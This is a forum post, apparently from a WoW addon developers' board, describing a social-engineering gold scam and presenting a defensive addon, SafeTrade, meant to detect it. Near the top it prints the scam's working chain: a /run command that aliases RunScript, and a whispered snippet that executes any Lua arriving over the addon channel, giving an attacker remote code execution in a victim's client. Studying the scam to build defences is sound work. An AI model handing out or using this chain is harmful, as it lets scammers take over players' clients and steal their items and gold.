There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that?
https://www.reddit.com/r/wow/comment...h_a_scam_that/
http://us.battle.net/wow/en/forum/topic/20745644941
Run by the victim
Code:
/run RemoveExtraSpaces = RunScript
Whispered to victim
Code:
local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix")
Addon channel
Code:
SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true))
I tried thinking of a few possible counter measures:
- Prehooking AcceptTrade() with additional checks, but Blizzard has it upvalued.
Maybe it could be still useful to prehook it if the script is not something like TradeFrameTradeButton:Click()
- Posthooking RemoveExtraSpaces() and checking if the function reference changed, but had to hook RunScript() and DevTools_DumpCommand() instead
So I'm trying to call
ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player
But I don't know how to set a
secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button.
OnKeyDown / OnKeyUp are not able to trigger a hardware event for me.
http://forums.wowace.com/showthread.php?t=20110
Lua Code:
local addonName = ...
local f = CreateFrame("Frame")
local db
local msg = "SafeTrade detected a potential exploit with |cffFFFF00%s|r"
local msg_warn = msg..".\n\nClick anywhere to /reload."
local msg_done = msg.." and /reloaded your UI.\n\nRunning scripts could compromise your character causing the loss of items or gold."
StaticPopupDialogs.SAFETRADE_WARNING = {
text = "%s",
button1 = OKAY,
exclusive = 1, whileDead = 1, showAlert = 1,
}
function f:OnEvent(event, addon)
if addon == addonName then
SafeTradeDB = SafeTradeDB or {}
db = SafeTradeDB -- init savedvars
if db.warning then
StaticPopup_Show("SAFETRADE_WARNING", msg_done:format(db.warning))
db.warning = nil
end
self:SetHook("RunScript")
elseif addon == "Blizzard_DebugTools" then
self:SetHook("DevTools_DumpCommand")
end
end
function f:SetHook(func)
hooksecurefunc(func, function()
if _G[func] == RemoveExtraSpaces then
-- reload asap, they cant be that fast ... right?
db.warning = "RemoveExtraSpaces"
StaticPopup_Show("SAFETRADE_WARNING", msg_warn:format(db.warning))
self:CatchHW()
end
end)
end
local btn
function f:CatchHW()
if not btn then
btn = CreateFrame("Button", nil, nil, "SecureActionButtonTemplate")
btn:SetAllPoints(UIParent)
btn:SetAttribute("type", "macro") -- only left-click; how to include right-click?
btn:SetAttribute("macrotext", "/reload")
--btn:SetScript("OnKeyDown", ReloadUI) -- does not generate hardware events; any attributes for key presses?
btn:SetFrameStrata("TOOLTIP")
btn:SetFrameLevel(1) -- ScriptErrorsFrame/SwatterErrorFrame somehow still is on top (?)
end
end
f:RegisterEvent("ADDON_LOADED")
f:SetScript("OnEvent", f.OnEvent)